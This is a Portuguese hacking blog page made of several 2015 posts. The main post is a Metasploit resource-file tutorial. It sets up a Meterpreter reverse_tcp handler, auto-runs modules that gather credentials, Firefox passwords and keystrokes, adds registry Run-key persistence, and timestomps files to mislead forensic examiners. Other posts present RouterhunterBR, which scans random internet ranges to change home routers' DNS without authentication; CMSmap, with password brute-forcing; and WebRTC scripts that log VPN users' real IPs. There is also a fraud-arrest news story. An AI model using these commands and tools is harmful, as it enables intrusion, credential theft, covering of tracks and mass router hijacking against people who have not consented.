Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

segunda-feira, 23 de fevereiro de 2015

Metasploit automatização resource files

Trabalhando com resource files

O console (msfconsole ou msf pro) suporta automação básica usando scripts de recursos. Esses scripts contêm um conjunto de comandos do console que são executadas quando as cargas de script. Além dos comandos básicos do console (core), esses scripts também são tratados como modelos ERB. ERB é uma maneira de incorporar o código Ruby diretamente em um documento. Isso permite que você chamar APIs que não são expostos através de comandos de console e até programaticamente gerar e retornar uma lista de comandos com base em sua própria lógica. Scripts de recursos podem ser especificados com a opção -r para o Console Metasploit e é executado automaticamente na inicialização se ele existir. Scripts de recursos também pode ser executado a partir do prompt do console por meio do comando de recursos (msf  > resource file-to-run.rc)


O console (msfconsole ou msf pro) suporta automação básica usando scripts de recursos. Esses scripts contêm um conjunto de comandos do console que são executadas quando as cargas de script. Além dos comandos básicos do console (core), esses scripts também são tratados como modelos ERB. ERB é uma maneira de incorporar o código Ruby diretamente em um documento. Isso permite que você chamar APIs que não são expostos através de comandos de console e até programaticamente gerar e retornar uma lista de comandos com base em sua própria lógica. Scripts de recursos podem ser especificados com a opção -r para o Console Metasploit e é executado automaticamente na inicialização se ele existir. Scripts de recursos também pode ser executado a partir do prompt do console por meio do comando de recursos (msf  > resource file-to-run.rc)



O seguinte exemplo cria um arquivo de recurso para exibir o número da versão do metasploit.
----------------------------------------------------------------------------------------------------------------------------------------------------------
touch version.rc
echo 'version' >> version.rc
----------------------------------------------------------------------------------------------------------------------------------------------------------
run  :  msfconsole -r version.rc
or    :  msfconsole -r /root/version.rc
or    :  msf > resource /root/version.rc



este arquivo de recurso irá carregar um directorio externo (ao msf) para que você possa apontar Metasploit aos seus 0-day, exploits, codificadores, cargas úteis (payloads), se estão a desenvolver exploits, auxiliarys, pós-módulos em ruby, então esta é a opção perfeita para que você possa carregar o seu directorio de trabalho no banco de dados do metasploit.
----------------------------------------------------------------------------------------------------------------------------------------------------------
touch startconf.rc
echo 'loadpath /home/secret/0day' >> startconf.rc
----------------------------------------------------------------------------------------------------------------------------------------------------------
run   :  msfconsole -r startconf.rc
or     :  msfconsole -r /root/startconf.rc
or     :  msf > resource /root/startconf.rc



Vamos criar um arquivo de recurso para iniciar um multi-manipulador (multi-handler) para nós. 
este 'listenner' vai receber a nossa carga útil (payload) reverse_tcp meterpreter.
----------------------------------------------------------------------------------------------------------------------------------------------------------
touch shell_listenner.rc
echo 'use exploit/multi/handler' >> shell_listenner.rc
echo 'set PAYLOAD windows/meterpreter/reverse_tcp' >> shell_listenner.rc
echo 'set LPORT 666' >> shell_listenner.rc
echo 'set LHOST 192.168.1.68' >> shell_listenner.rc
echo 'set ExitOnSession false' >> shell_listenner.rc
echo 'exploit -j -z' >> shell_listenner.rc
----------------------------------------------------------------------------------------------------------------------------------------------------------
run   :  msfconsole -r shell_listenner.rc
or     :  msfconsole -r /root/shell_listenner.rc
or     :  msf > resouce shell_listenner.rc



Scripts de auto-run são exelentes quando você precisa que varios módulos executem automaticamente
----------------------------------------------------------------------------------------------------------------------------------------------------------
touch autoruncommands.rc
echo 'run post/windows/manage/migrate' >> autoruncommands.rc
echo 'run post/windows/gather/checkvm' >> autoruncommands.rc
echo 'run post/windows/gather/credential_collector' >> autoruncommands.rc
echo 'run post/multi/gather/firefox_creds' >> autoruncommands.rc
echo 'run post/windows/capture/keylog_recorder' >> autoruncommands.rc
----------------------------------------------------------------------------------------------------------------------------------------------------------
run   :  msf > run multi_console_command -rc /root/autoruncommands.rc
ou executá-la no multi-manipulador (multi-handler) usando a flag AutoRunScript
run   : msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.68 LPORT=666 AutoRunScript='multi_console_command -rc /root/autoruncommands.rc' E
desta forma só precisamos de configurar o 'autorunscript' para apontar para o nosso arquivo de recursos, de modo que toda a vez que o manipulador (multi-handler) abre uma sessão irá executar todos os modulos escritos dentro do arquivo 'autoruncommands.rc'



O exemplo a seguir mostra como podemos persistir uma carga útil (payload) em post-exploração
----------------------------------------------------------------------------------------------------------------------------------------------------------
touch Post-Auto.rc
echo 'sysinfo' >> Post-Auto.rc
echo 'run migrate -n wininit.exe' >> Post-Auto.rc
echo 'upload /var/www/powershell.bat C:\\windows\\system32\\powershell.bat' >> Post-Auto.rc
echo 'upload /var/www/hidden.vbs C:\\windows\\system32\\hidden.vbs' >> Post-Auto.rc
echo 'reg setval -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -v persistence -d "C:\windows\system32\hidden.vbs"' >> Post-Auto.rc
echo 'reg enumkey -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' >> Post-Auto.rc
----------------------------------------------------------------------------------------------------------------------------------------------------------
run   :  msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.68 LPORT=666 AutoRunScript='multi_console_command -rc /root/Post-Auto.rc' E



Neste proximo exemplo vamos usar o nmap para escanear a nossa rede local em busca de hospedeiros vivos e exportar o relatorio em (.xml) formato, depois vamos construir um arquivo de recurso (msfdb.rc) para podermos exportar o arquivo xml para a base de dados do metasploit, para os hospedeiros encontrados poderem ser usados no metasploit.
escannear usando o nmap:
nmap -sV -Pn -p 1-1000 -O --open -oX /root/Random-Hosts.xml 192.168.1.0/24
contruindo resource file:
----------------------------------------------------------------------------------------------------------------------------------------------------------
touch msfdb.rc
echo 'db_import /root/Random-Hosts.xml' >> /root/msfdb.rc
echo 'hosts' >> /root/msfdb.rc
echo 'sevices' >> /root/msfdb.rc
----------------------------------------------------------------------------------------------------------------------------------------------------------
correr metasploit:
service metasploit start
msfconsole -r /root/msfdb.rc
limpar database:
msf > hosts -d
msf > services -d



As vezes no post-exploração precissamos de encobrir os nossos passos no systema alvo para enganar peritos forensicos, uma maneira de fazer isso é manipular o timestomp (mace) de um arquivo ou de um directorio (recursive) no exemplo a seguir vamos fazer o upload de um arquivo para o hospedeiro de destino e mudar o seu valor mace para outra data/hora para que o arquivo pareça ter sido criado/acessado no ano 2013, a flag (-r) permite-nos mudar o mace de todos os arquivos dentro de um directorio.
----------------------------------------------------------------------------------------------------------------------------------------------------------
touch mace.rc
echo 'run migrate -n wininit.exe' >> mace.rc
echo 'upload /var/www/powershell.ps1 %temp\\powershell.ps1%' >> mace.rc
echo 'timestomp -r %temp% "21/01/2013 23:26:35"' >> mace.rc
----------------------------------------------------------------------------------------------------------------------------------------------------------
run   : meterpreter > resource /root/mace.rc



O arquivo de recurso seguinte (scanner.rc) requer que o usuário defina RHOSTS globalmente usando: setg RHOSTS 192.168.1.68 (ip alvo) antes de lançar o resource file, e ele se usa do commando 'db_nmap' para salvar o scan feito na base de dados do metasploit. na tag <ruby> usamos o nmap para escannear por vulnerabilidades no protocol smb e samba que serão guardados em 'services' e 'vulns', depois da tag </ruby> o resource file vai se usar dos resultados contidos na DB para correr modulos de post-exploração.
----------------------------------------------------------------------------------------------------------------------------------------------------------
<ruby>
run_single("db_nmap -sU -sS -Pn -n --script=smb-check-vulns.nse,samba-vuln-cve-2012-1182 --script-args=unsafe=1 -p U:135,T:139,445 #{framework.datastore['RHOSTS']}")
run_single("services #{framework.datastore['RHOSTS']}")
run_single("vulns #{framework.datastore['RHOSTS']}")
</ruby>
use auxiliary/scanner/snmp/snmp_enum
run
use auxiliary/scanner/snmp/snmp_enumusers
run
use auxiliary/scanner/snmp/snmp_enumshares
run
----------------------------------------------------------------------------------------------------------------------------------------------------------
antes do resource file ser lançado:  msf > setg RHOSTS <target ip>
run  resource file:  msf > resource scanner.rc
unset global var: msf > unsetg RHOSTS
clean msf database: msf > hosts -d






quinta-feira, 19 de fevereiro de 2015

Conheça o scanner CMSmap feito em python que verifica (WordPress, Joomla e Drupa)


CMSmap é um scanner de código aberto CMS python que automatiza o processo de detecção de falhas do CMSs mais popular de segurança. O principal objetivo do CMSmap é integrar as vulnerabilidades comuns para diferentes tipos de CMSs em uma única ferramenta.  No momento, CMSs apoiado por CMSmap são WordPress, Joomla e Drupal.  Por favor, note que este projeto é um estado inicial. Como tal, você pode encontrar erros, falhas ou mulfunctions. Use por sua conta e risco!  Installation diretamente GIT: git clone https://github.com/Dionach/CMSmap.git


CMSmap é um scanner de código aberto CMS python que automatiza o processo de detecção de falhas do CMSs mais popular de segurança. O principal objetivo do CMSmap é integrar as vulnerabilidades comuns para diferentes tipos de CMSs em uma única ferramenta.

No momento, CMSs apoiado por CMSmap são WordPress, Joomla e Drupal.

Por favor, note que este projeto é um estado inicial. Como tal, você pode encontrar erros, falhas ou mulfunctions. Use por sua conta e risco!

Installation diretamente GIT:
git clone https://github.com/Dionach/CMSmap.git


CMSmap tool v0.3 - Simple CMS Scanner
Author: Mike Manzotti [email protected]
Usage: cmsmap.py -t 
          -t, --target    target URL (e.g. 'https://abc.test.com:8080/')
          -v, --verbose   verbose mode (Default: false)
          -T, --threads   number of threads (Default: 5)
          -u, --usr       username or file 
          -p, --psw       password or file
          -i, --input     scan multiple targets listed in a given text file
          -o, --output    save output in a file
          -k, --crack     password hashes file
          -w, --wordlist  wordlist file (Default: rockyou.txt - WordPress only)       
          -a, --agent     set custom user-agent  
          -U, --update    (C)MSmap, (W)ordpress plugins and themes, (J)oomla components, (D)rupal modules
          -f, --force     force scan (W)ordpress, (J)oomla or (D)rupal
          -F, --fullscan  full scan using large plugin lists. Slow! (Default: false)
          -h, --help      show this help   

Example: cmsmap.py -t https://example.com
         cmsmap.py -t https://example.com -f W -F
         cmsmap.py -t https://example.com -i targets.txt -o output.txt
         cmsmap.py -t https://example.com -u admin -p passwords.txt
         cmsmap.py -k hashes.txt


Uso de CMSmap para atacar alvos sem prévio consentimento mútuo é ilegal. É de responsabilidade do usuário final a obedecer todas as leis aplicáveis locais, estaduais e federais. Os desenvolvedores não assumimos nenhuma responsabilidade e não somos responsáveis por qualquer uso indevido ou danos causados por este programa.

sexta-feira, 13 de fevereiro de 2015

Scanner RouterhunterBR 1.0 - explorando roteadores

 
Hoje iremos apresentar o RouterhuntertBR 1.0!

Mas oque é o RouterhunterBR? Como funciona? Qual finalidade ?

  Inicialmente o RouterhunterBR foi desenvolvido para explorar vulnerabilidades DNSChanger em routers caseiros que possuem falhas em paginas  sem autenticação dentro do roteador, 
Assim modificando o DNS padrão dentro do roteador.

 Uma vez modificado o DNS padrão para o DNS Malicioso, você pode realizar o redirecionamento do trafego para paginas maliciosas.

  Como funciona o DNS?
O DNS (Domain Name System) é o serviço responsável por traduzir nomes em IP’s e vice-versa, isto é, quando escrevemos www.xxware.com, há uma consulta ao DNS para saber qual o IP correspondente.

O que é o DNSChanger?
O DNSChanger é um trojan capaz de redirecionar pedidos do utilizador para sites ilícitos. Na prática, este malware tem a capacidade de alterar as configurações do DNS da nossa máquina redirecionando o utilizador para sites com fins maliciosos. Imagine por exemplo que o seu sistema está infectado por este malware, aquilo que poderá acontecer é que o utilizador ao aceder a um determinado site (ex. facebook.com) poderá ser reencaminhado para um site não solicitado e potencialmente ilegal.


O RouterhunterBR funciona da seguinte maneira, ele roda pela internet procurando por faixas de ips pre-definidas ou aleatórias com intuito de explorar vulnerabilidade DNSChanger em routers(roteadores) caseiros. Por inicio está e a principal função do RouterHunter!, mas em breve novas atualizações estão por vir.

O RouterhunterBR funciona da seguinte maneira, ele roda pela internet procurando por faixas de ips pre-definidas ou aleatórias com intuito de explorar vulnerabilidade DNSChanger em routers(roteadores) caseiros. Por inicio está e a principal função do RouterHunter!, mas em breve novas atualizações estão por vir


* Description:*
  The script explores two vulnerabilities in routers
  01 - Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change Exploit
  reference: http://www.exploit-db.com/exploits/35995/

  02 - D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit
  reference: http://www.exploit-db.com/exploits/35917/

  03 - LG DVR LE6016D / Unauthenticated users/passwords disclosure exploitit
  reference: http://www.exploit-db.com/exploits/36014/

  ----------------------------------------------------------

 * Execute*
  Simple search:   php RouterHunterBR.php --range '177.100.255.1-20' -- dns1  8.8.8.8 --dns2 8.8.4.4 --output result.txt

Set IPS random:
php RouterHunterBR.php --rand --limit-ip 200 --dns1  8.8.8.8 --dns2 8.8.4.4 --output result.txt

Set source file:
php RouterHunterBR.php --file ips.txt --dns1  8.8.8.8 --dns2 8.8.4.4 --output result.txt

Set proxy:      
php RouterHunterBR.php --range '177.100.255.1-20' --dns1  8.8.8.8 --dns2 8.8.4.4 --output result.txt --proxy 'localhost:8118'
  Proxy format:

  •   --proxy 'localhost:8118'
  •  --proxy 'socks5://googleinurl@localhost:9050'
  •  --proxy 'http://admin:[email protected]:8080'

  ----------------------------------------------------------

 * Dependencies*
sudo apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl033

VÍDEO

quinta-feira, 12 de fevereiro de 2015

Downloader Aptoide APK

O que é a ferramenta, após renovar o seu site a APTOIDE mudou os métodos de Download, antes você entrava com a versão mobile, e baixava um .myapp e nele contia um link para Download do APK sem ter que baixar o Aplicativo oferecido pelo site, porém agora com a nova versão do web site deles, isso não é mais possível você tem que pegar diversas infos para chegar até esse um ".xml" e poder pegar esse link para download para baixar pelo Computador, pensando nisso foi criado o Downloader Aptoide APK v.1.1 Beta onde você pode colocar o seu link e baixar sem ter que ficar procurando as infos, e sem precisar baixar a APTOIDE em seu celular.

[+] Especificações Downloader Aptoide APK: 

O que é a ferramenta, após renovar o seu site a APTOIDE mudou os métodos de Download, antes você entrava com a versão mobile, e baixava um .myapp e nele contia um link para Download do APK sem ter que baixar o Aplicativo oferecido pelo site, porém agora com a nova versão do web site deles, isso não é mais possível você tem que pegar diversas infos para chegar até esse um ".xml" e poder pegar esse link para download para baixar pelo Computador, pensando nisso foi criado o Downloader Aptoide APK v.1.1 Beta onde você pode colocar o seu link e baixar sem ter que ficar procurando as infos, e sem precisar baixar a APTOIDE em seu celular.
----------------------------------------------------------

[+] Modo de usar:

1º Após pegar uma URL no site da APTOIDE de um app, vá até o site da ferramenta: http://breskott.tk/aptoide/ e cole no campo de URL e clique em "Gerar Link".
2º Após isso ele irá retornar uma página contendo o nome do APP e o nome da Loja, juntamente com seu Link Direto para baixar pelo PC e então transferir para o Celular sem precisar da APTOIDE.
3º Clique em "Download Direto" e irá iniciar automáticamente o Download
4º Finish..
----------------------------------------------------------

[+] Suporte:

Por ser uma versão Beta pode ocorrer erros, caso aconteça algum envie um e-mail para: [email protected]

sábado, 7 de fevereiro de 2015

Preso (Cracker) que causou prejuízo de R$ 5 milhões; golpes atingiam lojas virtuais e clientes delas



Leandro de Souza Simiema de 36 anos foi preso em flagrante após fazer compras pela internet e de ter pago através de contas bancárias hackeadas  de terceiros. Segundo a polícia, desde 2013 o prejuízo que o homem causou pode chegar a aproximadamente R$ 5 milhões.

Foi a maior volume de transações financeiras via Crackers que a polícia goiana conseguiu detectar.

Na ocasião ele havia feito compras de aparelhos celulares modelo Iphone 5 para revender. A prisão se deu na casa dele, nesta quinta-feira (5) na Vila Maria José, em Goiânia. Ocorreu no momento em que ele havia acabado de receber uma encomenda no valor de R$ 20 mil.

A prisão de Leandro evitou um prejuízo de R$150 mil reais em outras movimentações que havia feito ainda na madrugada de quinta.  De acordo com a adjunta da Delegacia Estadual de Investigações Criminais de Goiás (Deic) delegada Mayana Rezende, as mercadorias eram compradas de sites de lojas virtuaisconhecidas no mercado. Para efetivar a compra ele contava com a ajuda de outra pessoa.

“A partir do momento que ele conhecia a aprovação da conta, ele emitia o boleto e através do código de barras deste boleto, ele encaminhava para um Cracker no Pará. Este fazia o pagamento através de contas hackeadas. No caso em que pegamos em flagrante, é referente a uma vítima de São Paulo”, destaca a delegada.

Para realizar a compra, Leandro coletava números de CPFs de terceiros pela internet e abria e-mails falsos. Depois emitia o boleto bancário e passava para outro Cracker.

“Tem alguns indícios que a gente achou no computador dele que realmente, mas a associação dele tem ramificações não só no Pará, também em Minas. É um grupo criminoso muito forte até mesmo pelo volume financeiro de compras que encontramos no computador dele. Tinha uma contabilidade muito organizada, dividido por ano e mês”, relata Mayana Rezende.

Caixas vazias
Na casa de Leandro foram encontradas nove caixas de celulares vazias. Há informações de que o acusado, além de hackear,  praticava outro crime: enganava pessoas na hora da venda.

Como ele pagava os aparelhos com boletos bancários, gerava nota fiscal. Os preços eram praticamente os de mercado, com poucas diferenças, o que chamava a atenção de consumidores.

No entanto, em alguns casos ele apenas enviava caixas vazias, algumas ele colocava pilhas para dar um pouco de peso. Quando as pessoas abriam certificavam que tinham sido enganadas.

Dificuldade na prisão
A polícia avalia que Leandro é apenas um braço de uma grande quadrilha. Para a delegada Mayana Rezende, o modo de atuação do bando dificulta a localização e prisão dos suspeitos.

“A dificuldade de fazer a prisão e assegurar a punição destas pessoas é muito grande. Geralmente quem é o detentor das senhas hackeadas vem de um estado, quem faz a compra está em outro estado e a vítima também. Em um caso em questão as vítimas de São Paulo. A pessoa fazia as compras em Goiás e o pagamento do Boleto no Pará”, explica a adjunta de DEIC.

Prevenção
A delegada Mayana Rezende orienta que ao comprar em sites pela internet, verificar se são confiáveis ou não.  “Não é uma garantia, mas uma forma de diminuir as chances de golpe” ressalta.

A adjunta da DEIC ainda destaca que para evitar que senhas sejam hackeadas, é preciso verificar se não está entrando numa página falsa de um banco, observar terminais eletrônicos para ver se não há peça solta. Verificar se num estabelecimento comercial está pedindo o cartão mais de uma vez, sem ter algo registrado no visor.

Punição
Na casa de Leandro a polícia ainda encontrou R$ 6 mil em espécie e uma CNH falsa. Ele foi indiciado pelo crime de furto qualificado e falsificação de documento público. A pena poderá chegar a mais de 8 anos de prisão.

O que é um (Cracker)

FONTE: Diário de Goías

segunda-feira, 2 de fevereiro de 2015

WebRTC - JavaScript bypass TOR/VPN - windows

Usuários de VPN estão enfrentando uma falha de segurança enorme, em que  sites podem ter acesso facilmente a seus endereços de IP através WebRTC. A vulnerabilidade é limitado a navegadores de suporte, Firefox e Chrome, e parece afetar apenas os usuários do Windows. Felizmente a falha de segurança é relativamente fácil de corrigir.  WebRTC é uma API em desenvolvimento elaborada pela World Wide Web Consortium (W3C) para permitir aos navegadores executar aplicações de chamada telefônica, video chat e compartilhamento P2P sem a necessidade de plugins.   Revelações feitas pelo boxedThe Snowden deixaram claro que a privacidade on-line não é, certamente, um dado adquirido.  Apenas alguns dias atrás, nós aprendemos que o Governo canadense rastreados visitantes de dezenas de sites de compartilhamento de arquivo populares.  Como essas histórias fazem manchetes em tem todo o interesse mundial em serviços de anonimato, tais como VPNs tem aumentado, como até mesmo os usuários regulares da Internet não gosta da idéia de ser espionados.  Infelizmente, até mesmo os melhores serviços de VPN não podem garantir que ser 100% de segurança. Nesta semana, uma muito preocupante falha de segurança revelou que é fácil de ver os verdadeiros endereços IP de muitos usuários de VPN através de um recurso WebRTC.  Com algumas linhas de código, sites podem fazer solicitações para atordoar os servidores e log VPN IP-address dos usuários e o "hidden" home IP-address IP, bem como endereços de rede local.  A vulnerabilidade afeta navegadores WebRTC de suporte, Firefox e Chrome e parece estar limitada a máquinas Windows.  A demo publicada no GitHub pelo desenvolvedor Daniel Roesler permite que as pessoas para verificar se eles são afetados pela falha de segurança.

Usuários de VPN estão enfrentando uma falha de segurança enorme, em que  sites podem ter acesso facilmente a seus endereços de IP através WebRTC.
A vulnerabilidade é limitado a navegadores de suporte, Firefox e Chrome, e parece afetar apenas os usuários do Windows. Felizmente a falha de segurança é relativamente fácil de corrigir.

WebRTC é uma API em desenvolvimento elaborada pela World Wide Web Consortium (W3C) para permitir aos navegadores executar aplicações de chamada telefônica, video chat e compartilhamento P2P sem a necessidade de plugins.


Revelações feitas pelo boxedThe Snowden deixaram claro que a privacidade on-line não é, certamente, um dado adquirido.

Apenas alguns dias atrás, nós aprendemos que o Governo canadense rastreados visitantes de dezenas de sites de compartilhamento de arquivo populares.

Como essas histórias fazem manchetes em tem todo o interesse mundial em serviços de anonimato, tais como VPNs tem aumentado, como até mesmo os usuários regulares da Internet não gosta da idéia de ser espionados.

Infelizmente, até mesmo os melhores serviços de VPN não podem garantir que ser 100% de segurança. Nesta semana, uma muito preocupante falha de segurança revelou que é fácil de ver os verdadeiros endereços IP de muitos usuários de VPN através de um recurso WebRTC.

Com algumas linhas de código, sites podem fazer solicitações para atordoar os servidores e log VPN IP-address dos usuários e o "hidden" home IP-address IP, bem como endereços de rede local.

A vulnerabilidade afeta navegadores WebRTC de suporte, Firefox e Chrome e parece estar limitada a máquinas Windows.

A demo publicada no GitHub pelo desenvolvedor Daniel Roesler permite que as pessoas para verificar se eles são afetados pela falha de segurança.

DEMO:


Usuários de VPN estão enfrentando uma falha de segurança enorme, em que  sites podem ter acesso facilmente a seus endereços de IP através WebRTC.  A vulnerabilidade é limitado a navegadores de suporte, Firefox e Chrome, e parece afetar apenas os usuários do Windows. Felizmente a falha de segurança é relativamente fácil de corrigir.  Revelações feitas pelo boxedThe Snowden deixaram claro que a privacidade on-line não é, certamente, um dado adquirido.  Apenas alguns dias atrás, nós aprendemos que o Governo canadense rastreados visitantes de dezenas de sites de compartilhamento de arquivo populares.  Como essas histórias fazem manchetes em tem todo o interesse mundial em serviços de anonimato, tais como VPNs tem aumentado, como até mesmo os usuários regulares da Internet não gosta da idéia de ser espionados.  Infelizmente, até mesmo os melhores serviços de VPN não podem garantir que ser 100% de segurança. Nesta semana, uma muito preocupante falha de segurança revelou que é fácil de ver os verdadeiros endereços IP de muitos usuários de VPN através de um recurso WebRTC.  Com algumas linhas de código, sites podem fazer solicitações para atordoar os servidores e log VPN IP-address dos usuários e o "hidden" home IP-address IP, bem como endereços de rede local.  A vulnerabilidade afeta navegadores WebRTC de suporte, Firefox e Chrome e parece estar limitada a máquinas Windows.  A demo publicada no GitHub pelo desenvolvedor Daniel Roesler permite que as pessoas para verificar se eles são afetados pela falha de segurança.

TESTE-DEMO: https://diafygi.github.io/webrtc-ips/

A demo afirma que plugins do navegador não podem bloquear a vulnerabilidade, mas felizmente isso não é inteiramente verdade. Existem várias soluções fáceis disponíveis para corrigir a falha de segurança.

Usuários do Chrome podem instalar a extensão bloco WebRTC ou ScriptSafe, que tanto supostamente pode bloquear a vulnerabilidade.
https://chrome.google.com/webstore/detail/webrtc-block/nphkkbaidamjmhfanlpblblcadhfbkdm

Usuários do Firefox deve ser capaz de bloquear o pedido com o addon NoScript. Alternativamente, eles podem digitar "about: config" na barra de endereços e definir a configuração "media.peerconnection.enabled" para false.

Exemplo-firefox:

Usuários do Firefox deve ser capaz de bloquear o pedido com o addon NoScript. Alternativamente, eles podem digitar "about: config" na barra de endereços e definir a configuração "media.peerconnection.enabled" para false.  Exemplo-firefox:



Outras maneiras de fugir da falha.

"Talvez a melhor maneira de ser protegido de WebRTC e vulnerabilidades semelhantes é executar o túnel VPN diretamente no roteador. Isso permite que o usuário seja conectado a uma VPN diretamente via Wi-Fi, não deixando nenhuma possibilidade de um script desonestos ignorando um túnel VPN software e encontrar a própria IP real ", diz  Ben Van der Pelt tells - TorGuard’s.

"Durante testes usuários do Windows que foram conectados por meio de um roteador VPN não eram vulneráveis a vazamentos WebRTC IP mesmo sem quaisquer correções do navegador".

Enquanto as correções acima são relatados para o trabalho, o vazamento é um lembrete de que o anonimato nunca deve ser tomada como garantida.

Como é frequentemente o caso com este tipo de vulnerabilidades, os usuários de VPN e proxy devem verificar regularmente se a sua conexão é segura. Isso também inclui o teste contra vazamentos de DNS e vulnerabilidades de proxy.

Update: O FreeBSD também parece estar afetado pela vulnerabilidade.

Não só Google Chrome,Mozilla Firefox que usam suporte API WebRTC, mas também Opera e Maxthon Cloud Browser podem ter sidos afetados.

Com modificações fizemos nosso scripts de exploração que alem de capturar o ip já faz o trapalho de salvar em um outpufile.


ARQUIVO-1 EXPLORAÇÃO:
http://pastebin.com/2u55h7Dj

ARQUIVO-2 SALVAR IPS:
Nome arquivo inurlbrasil.php
http://pastebin.com/Wbw9GhPc

Ao acessar o arquivo exploração-1, o mesmo passa via request get os ips captados do cliente para o arquivo-2(inurlbrasil.php) , assim já armazenando o mesmo no arquivo local server detentor do script.

FILE OUTPUT:
Ao acessar o arquivo exploração-1, o mesmo passa via request get os ips captados do cliente para o arquivo-2(inurlbrasil.php) , assim já armazenando o mesmo no arquivo local server detentor do script.


Fonte referencia:
http://pt.wikipedia.org/wiki/WebRTC
https://www.reddit.com/r/VPN/comments/2tva1o/websites_can_now_use_webrtc_to_determine_your
https://torguard.net/blog/browser-security-vulnerability-may-allow-real-ip-leak/
http://torrentfreak.com/huge-security-flaw-leaks-vpn-users-real-ip-addresses-150130/
https://twitter.com/jeremiahg/status/561892669279191040